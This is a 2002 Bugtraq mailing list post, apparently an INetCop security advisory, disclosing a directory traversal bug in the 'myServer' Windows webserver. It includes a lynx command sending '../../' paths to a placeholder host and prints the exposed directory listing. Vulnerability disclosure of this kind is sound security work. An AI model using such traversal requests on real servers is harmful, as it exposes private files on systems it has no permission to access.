Bugtraq mailing list archives
Directory traversing bug in 'myServer' webserver.
From: "dong-h0un U" <xploit () hackermail com>
Date: Wed, 11 Dec 2002 22:57:46 +0800
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
INetCop Security Advisory #2002-0x82-010
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- Our 10th advisory does self-congratulation.
* Title: Directory traversing bug in 'myServer' webserver.
0x01. Description
It's very useful Windows webserver that is offered by Binary of C++.
It's run in Microsoft Windows platform fortunately only.
They have plan to export Linux platform firstly at the future.
We saved Linux. :-)
Vulnerability happens because webserver does not filter "../".
Herewith, vulnerability can do exploit.
(Server has died sometimes. yeh~ It's bug!)
0x02. Vulnerable Packages
Vendor site: http://myserverweb.sourceforge.net/
myserver 0.2 binaries
-myServerEXEC-0.2.zip
+Windows 95/98/2000
+Windows NT/2000
myserver 0.11 binaries
-myServerEXEC-0.11.zip
0x03. Exploit
See and enjoy this.
bash$ lynx -dump http://myServerhost/../../myServerEXEC-0.2 > x82-x0x
bash$ cat x82-x0x
Contents of folder ../../myServerEXEC-0.2/
_________________________________________________________________
File Last modify Size
[1]cgi-lib 0/11/102-12:4:16 System time
[2]control.exe 3/11/102-10:48:28 System time 258048 bytes
[3]CVS 0/11/102-12:4:18 System time
[4]languages 0/11/102-12:4:18 System time
[5]libhoard.dll 3/9/102-6:0:0 System time 32843 bytes
[6]logs 0/11/102-12:4:18 System time
[7]MIMEtypes.txt 0/11/102-3:50:42 System time 276 bytes
[8]myserver.exe 3/11/102-10:49:2 System time 200704 bytes
[9]myserver.xml 0/11/102-1:11:46 System time 2238 bytes
[10]readme.txt 0/11/102-9:59:6 System time 1836 bytes
[11]REGISTER SERVICE.bat 3/9/102-6:0:0 System time 20 bytes
[12]START CONSOLE.bat 3/9/102-6:0:0 System time 20 bytes
[13]START SERVICE.bat 3/9/102-6:0:0 System time 17 bytes
[14]STOP SERVICE.bat 3/9/102-6:0:0 System time 16 bytes
[15]system 0/11/102-12:4:18 System time
[16]UNREGISTER SERVICE.bat 3/9/102-6:0:0 System time 22 bytes
[17]web 0/11/102-12:4:18 System time
_________________________________________
Running on myServer 0.2
References
1. http://myServerhost/myServerEXEC-0.2/cgi-lib
2. http://myServerhost/myServerEXEC-0.2/control.exe
3. http://myServerhost/myServerEXEC-0.2/CVS
4. http://myServerhost/myServerEXEC-0.2/languages
5. http://myServerhost/myServerEXEC-0.2/libhoard.dll
6. http://myServerhost/myServerEXEC-0.2/logs
7. http://myServerhost/myServerEXEC-0.2/MIMEtypes.txt
8. http://myServerhost/myServerEXEC-0.2/myserver.exe
9. http://myServerhost/myServerEXEC-0.2/myserver.xml
10. http://myServerhost/myServerEXEC-0.2/readme.txt
11. http://myServerhost/myServerEXEC-0.2/REGISTERSERVICE.bat
12. http://myServerhost/myServerEXEC-0.2/STARTCONSOLE.bat
13. http://myServerhost/myServerEXEC-0.2/STARTSERVICE.bat
14. http://myServerhost/myServerEXEC-0.2/STOPSERVICE.bat
15. http://myServerhost/myServerEXEC-0.2/system
16. http://myServerhost/myServerEXEC-0.2/UNREGISTERSERVICE.bat
17. http://myServerhost/myServerEXEC-0.2/web
bash$
We tested it, in Windows 98/2000 professionals.
0x04. Patch
--
We decided it.
It can solve as chroot() function.
Therefore, we don't compose patch.
Construct safer webserver.
--
P.S: Sorry, for my poor english.
--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.
MSN & E-mail: szoahc(at)hotmail(dot)com,
xploit(at)hackermail(dot)com
INetCop Security Home: http://www.inetcop.org (Korean hacking game)
My World: http://x82.i21c.net
GPG public key: http://wizard.underattack.co.kr/~x82/h0me/pr0file/x82.k3y
--
--
_______________________________________________
Get your free email from http://www.hackermail.com
Powered by Outblaze
Current thread:
- Directory traversing bug in 'myServer' webserver. dong-h0un U (Dec 11)
